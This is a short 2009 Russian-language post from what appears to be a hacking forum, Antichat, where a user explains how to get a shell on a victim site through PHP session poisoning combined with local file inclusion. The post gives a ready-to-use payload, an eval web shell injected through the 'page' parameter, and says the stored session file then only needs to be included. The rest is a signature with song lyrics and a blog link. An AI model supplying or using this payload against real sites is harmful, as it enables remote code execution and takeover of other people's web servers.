22.12.2009, 14:42
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Pashkela
т.е. если я правильно понял, то просто набрав в урле-жертвы php-код и проинклудив сессию из /tmp можно получить шелл? Спасибо, революционный способ детектед
Чел просто слышал звон но не знет где он.
Если параметр page пишется в сессию, то достаточно вот этого:
Код:
page=<? eval($_REQUEST['cmd']); ?>
Ну и потом инклудить сессию. А лабуда с etc/passwd тут вообще не при чём.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|